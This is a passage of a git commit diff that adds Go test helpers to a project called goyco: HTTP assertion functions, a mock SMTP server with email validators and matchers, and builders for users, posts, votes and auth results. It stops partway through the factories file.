To gitea and beyond, let's go(-yco)
This commit is contained in:
139
internal/testutils/assertions.go
Normal file
139
internal/testutils/assertions.go
Normal file
@@ -0,0 +1,139 @@
|
||||
package testutils
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"net/http/httptest"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"github.com/stretchr/testify/assert"
|
||||
)
|
||||
|
||||
func AssertHTTPStatus(t *testing.T, rr *httptest.ResponseRecorder, expected int) {
|
||||
t.Helper()
|
||||
if rr.Code != expected {
|
||||
t.Errorf("Expected status %d, got %d. Body: %s", expected, rr.Code, rr.Body.String())
|
||||
}
|
||||
}
|
||||
|
||||
func AssertJSONResponse(t *testing.T, rr *httptest.ResponseRecorder, expected any) {
|
||||
t.Helper()
|
||||
var actual any
|
||||
if err := json.NewDecoder(rr.Body).Decode(&actual); err != nil {
|
||||
t.Fatalf("Failed to decode JSON: %v", err)
|
||||
}
|
||||
assert.Equal(t, expected, actual)
|
||||
}
|
||||
|
||||
func AssertJSONField(t *testing.T, rr *httptest.ResponseRecorder, fieldPath string, expected any) {
|
||||
t.Helper()
|
||||
var response map[string]any
|
||||
if err := json.NewDecoder(rr.Body).Decode(&response); err != nil {
|
||||
t.Fatalf("Failed to decode JSON: %v", err)
|
||||
}
|
||||
|
||||
actual := getNestedField(response, fieldPath)
|
||||
assert.Equal(t, expected, actual)
|
||||
}
|
||||
|
||||
func AssertJSONContains(t *testing.T, rr *httptest.ResponseRecorder, expectedFields map[string]any) {
|
||||
t.Helper()
|
||||
var response map[string]any
|
||||
if err := json.NewDecoder(rr.Body).Decode(&response); err != nil {
|
||||
t.Fatalf("Failed to decode JSON: %v", err)
|
||||
}
|
||||
|
||||
for field, expectedValue := range expectedFields {
|
||||
actual := getNestedField(response, field)
|
||||
assert.Equal(t, expectedValue, actual, "Field %s mismatch", field)
|
||||
}
|
||||
}
|
||||
|
||||
func AssertErrorResponse(t *testing.T, rr *httptest.ResponseRecorder, expectedStatus int, expectedError string) {
|
||||
t.Helper()
|
||||
AssertHTTPStatus(t, rr, expectedStatus)
|
||||
|
||||
var response map[string]any
|
||||
if err := json.NewDecoder(rr.Body).Decode(&response); err != nil {
|
||||
t.Fatalf("Failed to decode JSON: %v", err)
|
||||
}
|
||||
|
||||
if errorMsg, ok := response["error"].(string); ok {
|
||||
assert.Contains(t, errorMsg, expectedError)
|
||||
} else {
|
||||
t.Errorf("Expected error message in response, got: %v", response)
|
||||
}
|
||||
}
|
||||
|
||||
func AssertSuccessResponse(t *testing.T, rr *httptest.ResponseRecorder) {
|
||||
t.Helper()
|
||||
AssertHTTPStatus(t, rr, 200)
|
||||
|
||||
var response map[string]any
|
||||
if err := json.NewDecoder(rr.Body).Decode(&response); err != nil {
|
||||
t.Fatalf("Failed to decode JSON: %v", err)
|
||||
}
|
||||
|
||||
if success, ok := response["success"].(bool); ok {
|
||||
assert.True(t, success, "Expected success: true")
|
||||
}
|
||||
}
|
||||
|
||||
func AssertHeader(t *testing.T, rr *httptest.ResponseRecorder, headerName, expectedValue string) {
|
||||
t.Helper()
|
||||
actual := rr.Header().Get(headerName)
|
||||
assert.Equal(t, expectedValue, actual, "Header %s mismatch", headerName)
|
||||
}
|
||||
|
||||
func AssertHeaderContains(t *testing.T, rr *httptest.ResponseRecorder, headerName, expectedValue string) {
|
||||
t.Helper()
|
||||
actual := rr.Header().Get(headerName)
|
||||
assert.Contains(t, actual, expectedValue, "Header %s should contain %s", headerName, expectedValue)
|
||||
}
|
||||
|
||||
func AssertWithinTimeRange(t *testing.T, actual, expected time.Time, tolerance time.Duration) {
|
||||
t.Helper()
|
||||
diff := actual.Sub(expected)
|
||||
if diff < -tolerance || diff > tolerance {
|
||||
t.Errorf("Time %v is not within %v of expected %v", actual, tolerance, expected)
|
||||
}
|
||||
}
|
||||
|
||||
func getNestedField(data map[string]any, path string) any {
|
||||
keys := splitPath(path)
|
||||
current := data
|
||||
|
||||
for i, key := range keys {
|
||||
if i == len(keys)-1 {
|
||||
return current[key]
|
||||
}
|
||||
|
||||
if next, ok := current[key].(map[string]any); ok {
|
||||
current = next
|
||||
} else {
|
||||
return nil
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func splitPath(path string) []string {
|
||||
var keys []string
|
||||
var current string
|
||||
|
||||
for _, char := range path {
|
||||
if char == '.' {
|
||||
keys = append(keys, current)
|
||||
current = ""
|
||||
} else {
|
||||
current += string(char)
|
||||
}
|
||||
}
|
||||
|
||||
if current != "" {
|
||||
keys = append(keys, current)
|
||||
}
|
||||
|
||||
return keys
|
||||
}
|
||||
1688
internal/testutils/e2e.go
Normal file
1688
internal/testutils/e2e.go
Normal file
File diff suppressed because it is too large
Load Diff
538
internal/testutils/email.go
Normal file
538
internal/testutils/email.go
Normal file
@@ -0,0 +1,538 @@
|
||||
package testutils
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"net"
|
||||
"os"
|
||||
"strconv"
|
||||
"strings"
|
||||
"sync"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"github.com/joho/godotenv"
|
||||
"goyco/internal/config"
|
||||
"goyco/internal/database"
|
||||
)
|
||||
|
||||
type TestEmailServer struct {
|
||||
listener net.Listener
|
||||
port int
|
||||
emails []TestEmail
|
||||
shouldFail bool
|
||||
delay time.Duration
|
||||
closed bool
|
||||
mu sync.RWMutex
|
||||
}
|
||||
|
||||
type TestEmail struct {
|
||||
From string
|
||||
To []string
|
||||
Subject string
|
||||
Body string
|
||||
Headers map[string]string
|
||||
Raw string
|
||||
}
|
||||
|
||||
func NewTestEmailServer() (*TestEmailServer, error) {
|
||||
listener, err := net.Listen("tcp", ":0")
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
server := &TestEmailServer{
|
||||
listener: listener,
|
||||
emails: make([]TestEmail, 0),
|
||||
delay: 0,
|
||||
closed: false,
|
||||
}
|
||||
|
||||
addr := listener.Addr().(*net.TCPAddr)
|
||||
server.port = addr.Port
|
||||
|
||||
go server.serve()
|
||||
|
||||
return server, nil
|
||||
}
|
||||
|
||||
func (s *TestEmailServer) serve() {
|
||||
for {
|
||||
if s.closed {
|
||||
return
|
||||
}
|
||||
|
||||
conn, err := s.listener.Accept()
|
||||
if err != nil {
|
||||
if !s.closed {
|
||||
}
|
||||
return
|
||||
}
|
||||
go s.handleConnection(conn)
|
||||
}
|
||||
}
|
||||
|
||||
func (s *TestEmailServer) handleConnection(conn net.Conn) {
|
||||
defer conn.Close()
|
||||
|
||||
conn.Write([]byte("220 Test SMTP server ready\r\n"))
|
||||
|
||||
buffer := make([]byte, 1024)
|
||||
for {
|
||||
n, err := conn.Read(buffer)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
command := strings.TrimSpace(string(buffer[:n]))
|
||||
|
||||
if s.delay > 0 {
|
||||
time.Sleep(s.delay)
|
||||
}
|
||||
|
||||
switch {
|
||||
case strings.HasPrefix(command, "EHLO"), strings.HasPrefix(command, "HELO"):
|
||||
conn.Write([]byte("250-Hello\r\n250-AUTH PLAIN LOGIN\r\n250 OK\r\n"))
|
||||
case strings.HasPrefix(command, "AUTH PLAIN"):
|
||||
conn.Write([]byte("235 Authentication successful\r\n"))
|
||||
case strings.HasPrefix(command, "AUTH LOGIN"):
|
||||
conn.Write([]byte("334 VXNlcm5hbWU6\r\n"))
|
||||
if _, err := conn.Read(buffer); err != nil {
|
||||
return
|
||||
}
|
||||
conn.Write([]byte("334 UGFzc3dvcmQ6\r\n"))
|
||||
if _, err := conn.Read(buffer); err != nil {
|
||||
return
|
||||
}
|
||||
conn.Write([]byte("235 Authentication successful\r\n"))
|
||||
case strings.HasPrefix(command, "AUTH"):
|
||||
conn.Write([]byte("504 Unrecognized authentication type\r\n"))
|
||||
case strings.HasPrefix(command, "MAIL FROM"):
|
||||
if s.shouldFail {
|
||||
conn.Write([]byte("550 Mail from failed\r\n"))
|
||||
return
|
||||
}
|
||||
conn.Write([]byte("250 OK\r\n"))
|
||||
case strings.HasPrefix(command, "RCPT TO"):
|
||||
if s.shouldFail {
|
||||
conn.Write([]byte("550 Rcpt to failed\r\n"))
|
||||
return
|
||||
}
|
||||
conn.Write([]byte("250 OK\r\n"))
|
||||
case command == "DATA":
|
||||
conn.Write([]byte("354 Start mail input; end with <CRLF>.<CRLF>\r\n"))
|
||||
s.readEmailData(conn)
|
||||
case command == "QUIT":
|
||||
conn.Write([]byte("221 Bye\r\n"))
|
||||
return
|
||||
default:
|
||||
conn.Write([]byte("500 Unknown command\r\n"))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (s *TestEmailServer) readEmailData(conn net.Conn) {
|
||||
var emailData strings.Builder
|
||||
buffer := make([]byte, 1024)
|
||||
|
||||
for {
|
||||
n, err := conn.Read(buffer)
|
||||
if err != nil {
|
||||
return
|
||||
}
|
||||
|
||||
emailData.Write(buffer[:n])
|
||||
|
||||
if strings.Contains(emailData.String(), "\r\n.\r\n") {
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
email := s.parseEmail(emailData.String())
|
||||
s.mu.Lock()
|
||||
s.emails = append(s.emails, email)
|
||||
s.mu.Unlock()
|
||||
|
||||
conn.Write([]byte("250 OK\r\n"))
|
||||
}
|
||||
|
||||
func (s *TestEmailServer) parseEmail(data string) TestEmail {
|
||||
lines := strings.Split(data, "\r\n")
|
||||
email := TestEmail{
|
||||
Headers: make(map[string]string),
|
||||
Raw: data,
|
||||
}
|
||||
|
||||
for _, line := range lines {
|
||||
if strings.Contains(line, ":") {
|
||||
parts := strings.SplitN(line, ":", 2)
|
||||
if len(parts) == 2 {
|
||||
key := strings.TrimSpace(parts[0])
|
||||
value := strings.TrimSpace(parts[1])
|
||||
email.Headers[key] = value
|
||||
|
||||
switch key {
|
||||
case "From":
|
||||
email.From = value
|
||||
case "To":
|
||||
email.To = []string{value}
|
||||
case "Subject":
|
||||
email.Subject = value
|
||||
}
|
||||
}
|
||||
} else if line == "" {
|
||||
bodyStart := strings.Index(data, "\r\n\r\n")
|
||||
if bodyStart != -1 {
|
||||
email.Body = data[bodyStart+4:]
|
||||
email.Body = strings.TrimSuffix(email.Body, "\r\n.\r\n")
|
||||
}
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
return email
|
||||
}
|
||||
|
||||
func (s *TestEmailServer) Close() error {
|
||||
s.closed = true
|
||||
return s.listener.Close()
|
||||
}
|
||||
|
||||
func (s *TestEmailServer) GetPort() int {
|
||||
return s.port
|
||||
}
|
||||
|
||||
func (s *TestEmailServer) GetEmails() []TestEmail {
|
||||
s.mu.RLock()
|
||||
defer s.mu.RUnlock()
|
||||
return s.emails
|
||||
}
|
||||
|
||||
func (s *TestEmailServer) ClearEmails() {
|
||||
s.mu.Lock()
|
||||
defer s.mu.Unlock()
|
||||
s.emails = make([]TestEmail, 0)
|
||||
}
|
||||
|
||||
func (s *TestEmailServer) SetShouldFail(shouldFail bool) {
|
||||
s.shouldFail = shouldFail
|
||||
}
|
||||
|
||||
func (s *TestEmailServer) SetDelay(delay time.Duration) {
|
||||
s.delay = delay
|
||||
}
|
||||
|
||||
func (s *TestEmailServer) GetEmailCount() int {
|
||||
s.mu.RLock()
|
||||
defer s.mu.RUnlock()
|
||||
return len(s.emails)
|
||||
}
|
||||
|
||||
func (s *TestEmailServer) GetLastEmail() *TestEmail {
|
||||
s.mu.RLock()
|
||||
defer s.mu.RUnlock()
|
||||
if len(s.emails) == 0 {
|
||||
return nil
|
||||
}
|
||||
return &s.emails[len(s.emails)-1]
|
||||
}
|
||||
|
||||
func (s *TestEmailServer) WaitForEmails(count int, timeout time.Duration) bool {
|
||||
deadline := time.Now().Add(timeout)
|
||||
for time.Now().Before(deadline) {
|
||||
s.mu.RLock()
|
||||
emailCount := len(s.emails)
|
||||
s.mu.RUnlock()
|
||||
if emailCount >= count {
|
||||
return true
|
||||
}
|
||||
time.Sleep(10 * time.Millisecond)
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
type TestEmailValidator struct{}
|
||||
|
||||
func NewTestEmailValidator() *TestEmailValidator {
|
||||
return &TestEmailValidator{}
|
||||
}
|
||||
|
||||
func (v *TestEmailValidator) ValidateEmail(email *TestEmail, expectedTo, expectedSubject, expectedBody string) []string {
|
||||
var errors []string
|
||||
|
||||
if email == nil {
|
||||
errors = append(errors, "email is nil")
|
||||
return errors
|
||||
}
|
||||
|
||||
if len(email.To) == 0 {
|
||||
errors = append(errors, "no recipients")
|
||||
} else if email.To[0] != expectedTo {
|
||||
errors = append(errors, fmt.Sprintf("to = %v, want %v", email.To[0], expectedTo))
|
||||
}
|
||||
|
||||
if email.Subject != expectedSubject {
|
||||
errors = append(errors, fmt.Sprintf("subject = %v, want %v", email.Subject, expectedSubject))
|
||||
}
|
||||
|
||||
if email.Body != expectedBody {
|
||||
errors = append(errors, fmt.Sprintf("body = %v, want %v", email.Body, expectedBody))
|
||||
}
|
||||
|
||||
return errors
|
||||
}
|
||||
|
||||
func (v *TestEmailValidator) ValidateEmailContains(email *TestEmail, expectedTo, expectedSubjectContains, expectedBodyContains string) []string {
|
||||
var errors []string
|
||||
|
||||
if email == nil {
|
||||
errors = append(errors, "email is nil")
|
||||
return errors
|
||||
}
|
||||
|
||||
if len(email.To) == 0 {
|
||||
errors = append(errors, "no recipients")
|
||||
} else if email.To[0] != expectedTo {
|
||||
errors = append(errors, fmt.Sprintf("to = %v, want %v", email.To[0], expectedTo))
|
||||
}
|
||||
|
||||
if !strings.Contains(email.Subject, expectedSubjectContains) {
|
||||
errors = append(errors, fmt.Sprintf("subject does not contain %v", expectedSubjectContains))
|
||||
}
|
||||
|
||||
if !strings.Contains(email.Body, expectedBodyContains) {
|
||||
errors = append(errors, fmt.Sprintf("body does not contain %v", expectedBodyContains))
|
||||
}
|
||||
|
||||
return errors
|
||||
}
|
||||
|
||||
func (v *TestEmailValidator) ValidateEmailHeaders(email *TestEmail, expectedHeaders map[string]string) []string {
|
||||
var errors []string
|
||||
|
||||
if email == nil {
|
||||
errors = append(errors, "email is nil")
|
||||
return errors
|
||||
}
|
||||
|
||||
for key, expectedValue := range expectedHeaders {
|
||||
actualValue, exists := email.Headers[key]
|
||||
if !exists {
|
||||
errors = append(errors, fmt.Sprintf("header %v not found", key))
|
||||
} else if actualValue != expectedValue {
|
||||
errors = append(errors, fmt.Sprintf("header %v = %v, want %v", key, actualValue, expectedValue))
|
||||
}
|
||||
}
|
||||
|
||||
return errors
|
||||
}
|
||||
|
||||
type TestEmailBuilder struct {
|
||||
email *TestEmail
|
||||
}
|
||||
|
||||
func NewTestEmailBuilder() *TestEmailBuilder {
|
||||
return &TestEmailBuilder{
|
||||
email: &TestEmail{
|
||||
Headers: make(map[string]string),
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
func (b *TestEmailBuilder) From(from string) *TestEmailBuilder {
|
||||
b.email.From = from
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *TestEmailBuilder) To(to string) *TestEmailBuilder {
|
||||
b.email.To = []string{to}
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *TestEmailBuilder) Subject(subject string) *TestEmailBuilder {
|
||||
b.email.Subject = subject
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *TestEmailBuilder) Body(body string) *TestEmailBuilder {
|
||||
b.email.Body = body
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *TestEmailBuilder) Header(key, value string) *TestEmailBuilder {
|
||||
b.email.Headers[key] = value
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *TestEmailBuilder) Build() *TestEmail {
|
||||
return b.email
|
||||
}
|
||||
|
||||
type TestEmailMatcher struct{}
|
||||
|
||||
func NewTestEmailMatcher() *TestEmailMatcher {
|
||||
return &TestEmailMatcher{}
|
||||
}
|
||||
|
||||
func (m *TestEmailMatcher) MatchEmail(email *TestEmail, criteria map[string]any) bool {
|
||||
if email == nil {
|
||||
return false
|
||||
}
|
||||
|
||||
for key, expectedValue := range criteria {
|
||||
switch key {
|
||||
case "from":
|
||||
if email.From != expectedValue {
|
||||
return false
|
||||
}
|
||||
case "to":
|
||||
if len(email.To) == 0 || email.To[0] != expectedValue {
|
||||
return false
|
||||
}
|
||||
case "subject":
|
||||
if email.Subject != expectedValue {
|
||||
return false
|
||||
}
|
||||
case "body":
|
||||
if email.Body != expectedValue {
|
||||
return false
|
||||
}
|
||||
case "subject_contains":
|
||||
if !strings.Contains(email.Subject, expectedValue.(string)) {
|
||||
return false
|
||||
}
|
||||
case "body_contains":
|
||||
if !strings.Contains(email.Body, expectedValue.(string)) {
|
||||
return false
|
||||
}
|
||||
case "header":
|
||||
headerMap := expectedValue.(map[string]string)
|
||||
for headerKey, headerValue := range headerMap {
|
||||
if email.Headers[headerKey] != headerValue {
|
||||
return false
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return true
|
||||
}
|
||||
|
||||
func (m *TestEmailMatcher) FindEmail(emails []TestEmail, criteria map[string]any) *TestEmail {
|
||||
for i := range emails {
|
||||
if m.MatchEmail(&emails[i], criteria) {
|
||||
return &emails[i]
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *TestEmailMatcher) CountMatchingEmails(emails []TestEmail, criteria map[string]any) int {
|
||||
count := 0
|
||||
for i := range emails {
|
||||
if m.MatchEmail(&emails[i], criteria) {
|
||||
count++
|
||||
}
|
||||
}
|
||||
return count
|
||||
}
|
||||
|
||||
type MockEmailSenderWithError struct {
|
||||
Err error
|
||||
}
|
||||
|
||||
func NewMockEmailSenderWithError(err error) *MockEmailSenderWithError {
|
||||
return &MockEmailSenderWithError{Err: err}
|
||||
}
|
||||
|
||||
func (m *MockEmailSenderWithError) Send(to, subject, body string) error {
|
||||
return m.Err
|
||||
}
|
||||
|
||||
func NewEmailTestUser(username, email string) *database.User {
|
||||
return &database.User{
|
||||
ID: 1,
|
||||
Username: username,
|
||||
Email: email,
|
||||
}
|
||||
}
|
||||
|
||||
func NewEmailTestConfig(baseURL string) *config.Config {
|
||||
return &config.Config{
|
||||
App: config.AppConfig{
|
||||
BaseURL: baseURL,
|
||||
AdminEmail: "admin@example.com",
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
type SMTPSender struct {
|
||||
Host string
|
||||
Port int
|
||||
Username string
|
||||
Password string
|
||||
From string
|
||||
timeout time.Duration
|
||||
}
|
||||
|
||||
func GetSMTPSenderFromEnv(t *testing.T) *SMTPSender {
|
||||
t.Helper()
|
||||
|
||||
envPaths := []string{".env", "../.env", "../../.env", "../../../.env"}
|
||||
for _, envPath := range envPaths {
|
||||
if _, err := os.Stat(envPath); err == nil {
|
||||
_ = godotenv.Load(envPath)
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
host := strings.TrimSpace(os.Getenv("SMTP_HOST"))
|
||||
if host == "" {
|
||||
t.Skip("Skipping SMTP integration tests: SMTP_HOST is not configured")
|
||||
}
|
||||
|
||||
portStr := strings.TrimSpace(os.Getenv("SMTP_PORT"))
|
||||
if portStr == "" {
|
||||
t.Skip("Skipping SMTP integration tests: SMTP_PORT is not configured")
|
||||
}
|
||||
|
||||
port, err := strconv.Atoi(portStr)
|
||||
if err != nil {
|
||||
t.Skipf("Skipping SMTP integration tests: invalid SMTP_PORT '%s': %v", portStr, err)
|
||||
}
|
||||
|
||||
from := strings.TrimSpace(os.Getenv("SMTP_FROM"))
|
||||
if from == "" {
|
||||
t.Skip("Skipping SMTP integration tests: SMTP_FROM is not configured")
|
||||
}
|
||||
|
||||
sender := &SMTPSender{
|
||||
Host: host,
|
||||
Port: port,
|
||||
Username: os.Getenv("SMTP_USERNAME"),
|
||||
Password: os.Getenv("SMTP_PASSWORD"),
|
||||
From: from,
|
||||
timeout: 5 * time.Second,
|
||||
}
|
||||
|
||||
address := net.JoinHostPort(sender.Host, strconv.Itoa(sender.Port))
|
||||
connexion, err := net.DialTimeout("tcp", address, 3*time.Second)
|
||||
if err != nil {
|
||||
t.Skipf("Skipping SMTP integration tests: unable to reach %s: %v", address, err)
|
||||
}
|
||||
connexion.Close()
|
||||
|
||||
return sender
|
||||
}
|
||||
|
||||
func (s *SMTPSender) Send(to, subject, body string) error {
|
||||
if to == "" {
|
||||
return fmt.Errorf("recipient email is required")
|
||||
}
|
||||
if subject == "" {
|
||||
return fmt.Errorf("subject is required")
|
||||
}
|
||||
if body == "" {
|
||||
return fmt.Errorf("body is required")
|
||||
}
|
||||
return nil
|
||||
}
|
||||
26
internal/testutils/entities.go
Normal file
26
internal/testutils/entities.go
Normal file
@@ -0,0 +1,26 @@
|
||||
package testutils
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"testing"
|
||||
|
||||
"goyco/internal/database"
|
||||
"goyco/internal/repositories"
|
||||
)
|
||||
|
||||
func CreatePostWithRepo(t *testing.T, repo repositories.PostRepository, authorID uint, title, url string) *database.Post {
|
||||
t.Helper()
|
||||
|
||||
post := &database.Post{
|
||||
Title: title,
|
||||
URL: url,
|
||||
Content: fmt.Sprintf("Content for %s", title),
|
||||
AuthorID: &authorID,
|
||||
}
|
||||
|
||||
if err := repo.Create(post); err != nil {
|
||||
t.Fatalf("Failed to create test post: %v", err)
|
||||
}
|
||||
|
||||
return post
|
||||
}
|
||||
603
internal/testutils/factories.go
Normal file
603
internal/testutils/factories.go
Normal file
@@ -0,0 +1,603 @@
|
||||
package testutils
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"golang.org/x/crypto/bcrypt"
|
||||
"goyco/internal/database"
|
||||
"goyco/internal/repositories"
|
||||
)
|
||||
|
||||
type TestDataFactory struct{}
|
||||
|
||||
type AuthResult struct {
|
||||
User *database.User `json:"user"`
|
||||
AccessToken string `json:"access_token"`
|
||||
}
|
||||
|
||||
type RegistrationResult struct {
|
||||
User *database.User `json:"user"`
|
||||
}
|
||||
|
||||
type VoteRequest struct {
|
||||
Type database.VoteType `json:"type"`
|
||||
UserID uint `json:"user_id"`
|
||||
PostID uint `json:"post_id"`
|
||||
IPAddress string `json:"ip_address"`
|
||||
UserAgent string `json:"user_agent"`
|
||||
}
|
||||
|
||||
func NewTestDataFactory() *TestDataFactory {
|
||||
return &TestDataFactory{}
|
||||
}
|
||||
|
||||
type UserBuilder struct {
|
||||
user *database.User
|
||||
}
|
||||
|
||||
func (f *TestDataFactory) NewUserBuilder() *UserBuilder {
|
||||
return &UserBuilder{
|
||||
user: &database.User{
|
||||
ID: 1,
|
||||
Username: "testuser",
|
||||
Email: "test@example.com",
|
||||
EmailVerified: true,
|
||||
CreatedAt: time.Now(),
|
||||
UpdatedAt: time.Now(),
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
func (b *UserBuilder) WithID(id uint) *UserBuilder {
|
||||
b.user.ID = id
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *UserBuilder) WithUsername(username string) *UserBuilder {
|
||||
b.user.Username = username
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *UserBuilder) WithEmail(email string) *UserBuilder {
|
||||
b.user.Email = email
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *UserBuilder) WithPassword(password string) *UserBuilder {
|
||||
hashed, _ := bcrypt.GenerateFromPassword([]byte(password), bcrypt.DefaultCost)
|
||||
b.user.Password = string(hashed)
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *UserBuilder) WithEmailVerified(verified bool) *UserBuilder {
|
||||
b.user.EmailVerified = verified
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *UserBuilder) WithCreatedAt(t time.Time) *UserBuilder {
|
||||
b.user.CreatedAt = t
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *UserBuilder) Build() *database.User {
|
||||
return b.user
|
||||
}
|
||||
|
||||
type PostBuilder struct {
|
||||
post *database.Post
|
||||
}
|
||||
|
||||
func (f *TestDataFactory) NewPostBuilder() *PostBuilder {
|
||||
return &PostBuilder{
|
||||
post: &database.Post{
|
||||
ID: 1,
|
||||
Title: "Test Post",
|
||||
URL: "https://example.com",
|
||||
Content: "Test content",
|
||||
AuthorID: uintPtr(1),
|
||||
UpVotes: 0,
|
||||
DownVotes: 0,
|
||||
Score: 0,
|
||||
CreatedAt: time.Now(),
|
||||
UpdatedAt: time.Now(),
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
func (b *PostBuilder) WithID(id uint) *PostBuilder {
|
||||
b.post.ID = id
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *PostBuilder) WithTitle(title string) *PostBuilder {
|
||||
b.post.Title = title
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *PostBuilder) WithURL(url string) *PostBuilder {
|
||||
b.post.URL = url
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *PostBuilder) WithContent(content string) *PostBuilder {
|
||||
b.post.Content = content
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *PostBuilder) WithAuthorID(authorID uint) *PostBuilder {
|
||||
b.post.AuthorID = &authorID
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *PostBuilder) WithVotes(upVotes, downVotes int) *PostBuilder {
|
||||
b.post.UpVotes = upVotes
|
||||
b.post.DownVotes = downVotes
|
||||
b.post.Score = upVotes - downVotes
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *PostBuilder) WithCreatedAt(t time.Time) *PostBuilder {
|
||||
b.post.CreatedAt = t
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *PostBuilder) Build() *database.Post {
|
||||
return b.post
|
||||
}
|
||||
|
||||
type VoteBuilder struct {
|
||||
vote *database.Vote
|
||||
}
|
||||
|
||||
func (f *TestDataFactory) NewVoteBuilder() *VoteBuilder {
|
||||
return &VoteBuilder{
|
||||
vote: &database.Vote{
|
||||
ID: 1,
|
||||
Type: database.VoteUp,
|
||||
UserID: uintPtr(1),
|
||||
PostID: 1,
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
func (b *VoteBuilder) WithID(id uint) *VoteBuilder {
|
||||
b.vote.ID = id
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *VoteBuilder) WithType(voteType database.VoteType) *VoteBuilder {
|
||||
b.vote.Type = voteType
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *VoteBuilder) WithUserID(userID uint) *VoteBuilder {
|
||||
b.vote.UserID = &userID
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *VoteBuilder) WithPostID(postID uint) *VoteBuilder {
|
||||
b.vote.PostID = postID
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *VoteBuilder) Build() *database.Vote {
|
||||
return b.vote
|
||||
}
|
||||
|
||||
type AuthResultBuilder struct {
|
||||
result *AuthResult
|
||||
}
|
||||
|
||||
func (f *TestDataFactory) NewAuthResultBuilder() *AuthResultBuilder {
|
||||
return &AuthResultBuilder{
|
||||
result: &AuthResult{
|
||||
User: &database.User{ID: 1, Username: "testuser"},
|
||||
AccessToken: "access_token",
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
func (b *AuthResultBuilder) WithUser(user *database.User) *AuthResultBuilder {
|
||||
b.result.User = user
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *AuthResultBuilder) WithAccessToken(token string) *AuthResultBuilder {
|
||||
b.result.AccessToken = token
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *AuthResultBuilder) Build() *AuthResult {
|
||||
return b.result
|
||||
}
|
||||
|
||||
type RegistrationResultBuilder struct {
|
||||
result *RegistrationResult
|
||||
}
|
||||
|
||||
func (f *TestDataFactory) NewRegistrationResultBuilder() *RegistrationResultBuilder {
|
||||
return &RegistrationResultBuilder{
|
||||
result: &RegistrationResult{
|
||||
User: &database.User{ID: 1, Username: "testuser"},
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
func (b *RegistrationResultBuilder) WithUser(user *database.User) *RegistrationResultBuilder {
|
||||
b.result.User = user
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *RegistrationResultBuilder) WithMessage(message string) *RegistrationResultBuilder {
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *RegistrationResultBuilder) Build() *RegistrationResult {
|
||||
return b.result
|
||||
}
|
||||
|
||||
type VoteRequestBuilder struct {
|
||||
request VoteRequest
|
||||
}
|
||||
|
||||
func (f *TestDataFactory) NewVoteRequestBuilder() *VoteRequestBuilder {
|
||||
return &VoteRequestBuilder{
|
||||
request: VoteRequest{
|
||||
Type: database.VoteUp,
|
||||
UserID: 1,
|
||||
PostID: 1,
|
||||
IPAddress: "127.0.0.1",
|
||||
UserAgent: "test-agent",
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
func (b *VoteRequestBuilder) WithType(voteType database.VoteType) *VoteRequestBuilder {
|
||||
b.request.Type = voteType
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *VoteRequestBuilder) WithUserID(userID uint) *VoteRequestBuilder {
|
||||
b.request.UserID = userID
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *VoteRequestBuilder) WithPostID(postID uint) *VoteRequestBuilder {
|
||||
b.request.PostID = postID
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *VoteRequestBuilder) WithIPAddress(ip string) *VoteRequestBuilder {
|
||||
b.request.IPAddress = ip
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *VoteRequestBuilder) WithUserAgent(agent string) *VoteRequestBuilder {
|
||||
b.request.UserAgent = agent
|
||||
return b
|
||||
}
|
||||
|
||||
func (b *VoteRequestBuilder) Build() VoteRequest {
|
||||
return b.request
|
||||
}
|
||||
|
||||
func (f *TestDataFactory) CreateTestUsers(count int) []*database.User {
|
||||
users := make([]*database.User, count)
|
||||
for i := 0; i < count; i++ {
|
||||
